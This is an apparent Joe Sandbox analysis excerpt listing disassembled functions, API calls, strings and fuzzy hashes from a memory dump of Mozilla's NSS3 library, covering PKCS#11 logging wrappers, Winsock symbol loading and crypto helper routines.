Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
API String ID: 1003633598-3530272145
Opcode ID: d11c6b2b8f779a869b5f8764835bcce03363dcfa2fd1b2be586aaf6653e6225e
Instruction ID: eb5d7e591c1abf3e4ff91e78d27b30943b75bb2dfa76bd84ccd9e7ab929c6c4f
Opcode Fuzzy Hash: d11c6b2b8f779a869b5f8764835bcce03363dcfa2fd1b2be586aaf6653e6225e
Instruction Fuzzy Hash: 5F41E335602104ABDB209F98DF4CF9A77B5EB4631DF089835E80857B12DB35BD0ADBA1

Function 6C7A4CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C7A4CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A4D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A4D37

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A4D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C7A4D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A4D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C7A4DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C7A4DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C7A4E20

Strings

*pulSize = 0x%x, xrefs: 6C7A4E1B
hObject = 0x%x, xrefs: 6C7A4D65, 6C7A4D75
(CK_INVALID_HANDLE), xrefs: 6C7A4D30, 6C7A4D83
C_GetObjectSize, xrefs: 6C7A4CEE
pulSize = 0x%p, xrefs: 6C7A4DB7
hSession = 0x%x, xrefs: 6C7A4D12, 6C7A4D22

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
API String ID: 1003633598-3553622718
Opcode ID: e7bb931f9b4356c09efd39c2b8af564d6a2924177f5cbc88cec5bbada6506c2a
Instruction ID: f59eb13f13c76fc55927f1081b007e23a74c06f73c0d56342d509d698f3e0e2b
Opcode Fuzzy Hash: e7bb931f9b4356c09efd39c2b8af564d6a2924177f5cbc88cec5bbada6506c2a
Instruction Fuzzy Hash: 6F41F831601104AFDB208B94DF8DF6A7775EB4631DF048935E9085BB12DB36BC09D791

Function 6C7A2F00 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6C7A2F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A2F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A2F63

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A2F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6C7A2F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6C7A2FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6C7A2FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6C7A2FE7

Strings

pNewPin = 0x%p, xrefs: 6C7A2FC9
ulOldLen = %d, xrefs: 6C7A2FB0
pOldPin = 0x%p, xrefs: 6C7A2F95
(CK_INVALID_HANDLE), xrefs: 6C7A2F5C
ulNewLen = %d, xrefs: 6C7A2FE2
C_SetPIN, xrefs: 6C7A2F21
hSession = 0x%x, xrefs: 6C7A2F3E, 6C7A2F4E

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN
API String ID: 1003633598-3716813897
Opcode ID: 47b768b44927e9d6c121cb5c0a6d552c5ba272305c98d09644894273daeff468
Instruction ID: 8d5afb632fc2df0e8a4309bbd4b11b99a74c521681291e652a9b0b1a17565622
Opcode Fuzzy Hash: 47b768b44927e9d6c121cb5c0a6d552c5ba272305c98d09644894273daeff468
Instruction Fuzzy Hash: C831D235602154ABCB209F99CF4CE5A77B1EB4A31DF048535E808A7B12DB34BC09CBD1

Function 6C7AA9A0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptMessageBegin), ref: 6C7AA9C6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7AA9F4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7AAA03

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7AAA19
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C7AAA3A
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C7AAA55
PR_LogPrint.NSS3( pAssociatedData = 0x%p,?), ref: 6C7AAA6E
PR_LogPrint.NSS3( ulAssociatedDataLen = 0x%p,?), ref: 6C7AAA87

Strings

ulParameterLen = 0x%p, xrefs: 6C7AAA50
pParameter = 0x%p, xrefs: 6C7AAA35
pAssociatedData = 0x%p, xrefs: 6C7AAA69
ulAssociatedDataLen = 0x%p, xrefs: 6C7AAA82
(CK_INVALID_HANDLE), xrefs: 6C7AA9FC
C_DecryptMessageBegin, xrefs: 6C7AA9C1
hSession = 0x%x, xrefs: 6C7AA9DE, 6C7AA9EE

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pAssociatedData = 0x%p$ pParameter = 0x%p$ ulAssociatedDataLen = 0x%p$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_DecryptMessageBegin
API String ID: 1003633598-2188218412
Opcode ID: 7908065dd089a7180eb57031ecae31655caeed2b36e149965e01463d9dbc8bce
Instruction ID: 92b19f5fcf1f287bfa4ab6580bd92cc8a72485ee45b3560fd10079e7daeb5c26
Opcode Fuzzy Hash: 7908065dd089a7180eb57031ecae31655caeed2b36e149965e01463d9dbc8bce
Instruction Fuzzy Hash: 6431CF35602154ABDB20DF98DF4CF9A7BB1FB4A32DF048575E80867A12D734AC09CB91

Function 6C83CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C83CC7B), ref: 6C83CD7A

Part of subcall function 6C83CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C7AC1A8,?), ref: 6C83CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C83CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C83CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C83CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C83CD8E

Part of subcall function 6C7605C0: PR_EnterMonitor.NSS3 ref: 6C7605D1
Part of subcall function 6C7605C0: PR_ExitMonitor.NSS3 ref: 6C7605EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C83CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C83CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C83CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C83CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C83CE48

Strings

getnameinfo, xrefs: 6C83CDB2, 6C83CE23
freeaddrinfo, xrefs: 6C83CD9F, 6C83CE10
getaddrinfo, xrefs: 6C83CD88, 6C83CDF9
wship6.dll, xrefs: 6C83CDE3
ws2_32.dll, xrefs: 6C83CD75

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: e258a63189f96e4154e8f37dc9ed063072da3045cb337dc15e230a8b019999f7
Instruction ID: af849f89bd16e9b2b368414adff6a1678242f668c37f7a19fcd3f7a5c5c82179
Opcode Fuzzy Hash: e258a63189f96e4154e8f37dc9ed063072da3045cb337dc15e230a8b019999f7
Instruction Fuzzy Hash: D111A5E5E0213112DB3166FA7E089AA38585F0225DF146E39F81992F43FB15D905C7E6

Function 6C7E0C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,~l), ref: 6C7E0C81

Part of subcall function 6C7CBE30: SECOID_FindOID_Util.NSS3(6C78311B,00000000,?,6C78311B,?), ref: 6C7CBE44

Part of subcall function 6C7B8500: SECOID_GetAlgorithmTag_Util.NSS3(6C7B95DC,00000000,00000000,00000000,?,6C7B95DC,00000000,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7B8517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7E0CC4

Part of subcall function 6C7CFAB0: free.MOZGLUE(?,-00000001,?,?,6C76F673,00000000,00000000), ref: 6C7CFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7E0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C7E0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C7E0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C7E0D7D
free.MOZGLUE(00000000), ref: 6C7E0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7E0DC1
free.MOZGLUE(00000000), ref: 6C7E0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7E0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C7E0E0F

Part of subcall function 6C7B95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7B95E0
Part of subcall function 6C7B95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7B95F5
Part of subcall function 6C7B95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C7B9609
Part of subcall function 6C7B95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7B961D
Part of subcall function 6C7B95C0: PK11_GetInternalSlot.NSS3 ref: 6C7B970B
Part of subcall function 6C7B95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C7B9756
Part of subcall function 6C7B95C0: PK11_GetIVLength.NSS3(?), ref: 6C7B9767
Part of subcall function 6C7B95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C7B977E
Part of subcall function 6C7B95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7B978E

Strings

*,~l, xrefs: 6C7E0DCC
*,~l, xrefs: 6C7E0C69, 6C7E0DE0, 6C7E0C80, 6C7E0C8B, 6C7E0CAF
-$~l, xrefs: 6C7E0C64

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,~l$*,~l$-$~l
API String ID: 3136566230-3769478742
Opcode ID: ef63f6b7c8b5465c02eccb779cf08eecd39ef6f84c70c67d9531c1960827a40a
Instruction ID: c2355abc624eadbf6f39c9a0fa2ac4c72822aaeb98c48dc68dc1edb561a9b45a
Opcode Fuzzy Hash: ef63f6b7c8b5465c02eccb779cf08eecd39ef6f84c70c67d9531c1960827a40a
Instruction Fuzzy Hash: 5141B4B2900246ABEB00DF65DE4ABAF7678BF0530CF140134ED1567741EB35AA54DBE2

Function 6C7D6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C8A1DE0,?), ref: 6C7D6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7D6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C7D6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C7D6D82
DER_GetInteger_Util.NSS3(?), ref: 6C7D6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7D6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C7D6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C7D6F19
PK11_DigestBegin.NSS3(00000000), ref: 6C7D6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C7D6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C7D7011
PK11_FreeSymKey.NSS3(00000000), ref: 6C7D7033
free.MOZGLUE(?), ref: 6C7D703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C7D7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C7D7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C7D70AF

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 31fa6d9fe253f51bad29fd5119871cfdc30181a1f97bd8e5c858ca383d5f17c5
Instruction ID: 1ee7d1d60f0f330d4a9b04a4e9f37032468354f59850673b84eb8cf076833c14
Opcode Fuzzy Hash: 31fa6d9fe253f51bad29fd5119871cfdc30181a1f97bd8e5c858ca383d5f17c5
Instruction Fuzzy Hash: 4AA119719042019BEB009F24DF49B5A32A4EB8130CF268D39E958DBB81F735FA49C793

Function 6C79AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79AF39
PR_Unlock.NSS3(?,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79AF69
TlsGetValue.KERNEL32 ref: 6C79B06B
EnterCriticalSection.KERNEL32(?), ref: 6C79B083
PR_Unlock.NSS3(?), ref: 6C79B0A4
TlsGetValue.KERNEL32 ref: 6C79B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6C79B0D9
PR_Unlock.NSS3 ref: 6C79B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C79B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C79B182

Part of subcall function 6C7CFAB0: free.MOZGLUE(?,-00000001,?,?,6C76F673,00000000,00000000), ref: 6C7CFAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C79B177

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C77AB95,00000000,?,00000000,00000000,00000000), ref: 6C79B1C2

Part of subcall function 6C7C1560: TlsGetValue.KERNEL32(00000000,?,6C790844,?), ref: 6C7C157A
Part of subcall function 6C7C1560: EnterCriticalSection.KERNEL32(?,?,?,6C790844,?), ref: 6C7C158F
Part of subcall function 6C7C1560: PR_Unlock.NSS3(?,?,?,?,6C790844,?), ref: 6C7C15B2

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: 8bf9f46cf99945868471606e270b3777f8cb5ef9ca3bbefbe9a8fb5a489b0e58
Instruction ID: 852677da9026b2a56527c403fcd75b1a3831c76fee9ff4b250ee04c487d8560f
Opcode Fuzzy Hash: 8bf9f46cf99945868471606e270b3777f8cb5ef9ca3bbefbe9a8fb5a489b0e58
Instruction Fuzzy Hash: 1BA1C1B1E002069BEF109F64ED49BAAB7B4FF05308F104134E905A7B52E731E955CBE1

Function 6C792C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?yl,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792C62
EnterCriticalSection.KERNEL32(0000001C,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792C76
PL_HashTableLookup.NSS3(00000000,?,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792C93

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23), ref: 6C792CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C78E477,?,?,?,00000001,00000000,?), ref: 6C792CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C78E477,?,?,?,00000001,00000000,?), ref: 6C792D4D
EnterCriticalSection.KERNEL32(?), ref: 6C792D61
PL_HashTableLookup.NSS3(?,?), ref: 6C792D71
PR_Unlock.NSS3(?), ref: 6C792D7E

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

Strings

#?yl, xrefs: 6C792C43

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?yl
API String ID: 2446853827-101552813
Opcode ID: 8c921c25add2d73404842b6f0b34fa6951c54498e4851ad2a64c54d174c5784b
Instruction ID: cca539bb5a89afce41e8296ae24c582d20a1c198c0117a31fa250013ba0724b2
Opcode Fuzzy Hash: 8c921c25add2d73404842b6f0b34fa6951c54498e4851ad2a64c54d174c5784b
Instruction Fuzzy Hash: A85127B6D00105ABDB10AF24ED498AAB778FF1635CB048534ED1897B12E731ED64C7E1

Function 6C7EAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7EADB1

Part of subcall function 6C7CBE30: SECOID_FindOID_Util.NSS3(6C78311B,00000000,?,6C78311B,?), ref: 6C7CBE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C7EADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C7EAE08

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7EAE25
PL_FreeArenaPool.NSS3 ref: 6C7EAE63
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C7EAE4D

Part of subcall function 6C6F4C70: TlsGetValue.KERNEL32(?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4C97
Part of subcall function 6C6F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CB0
Part of subcall function 6C6F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7EAE93
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C7EAECC
PL_FreeArenaPool.NSS3 ref: 6C7EAEDE
PL_FinishArenaPool.NSS3 ref: 6C7EAEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7EAEF5
PL_FinishArenaPool.NSS3 ref: 6C7EAF16

Strings

security, xrefs: 6C7EADEE

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
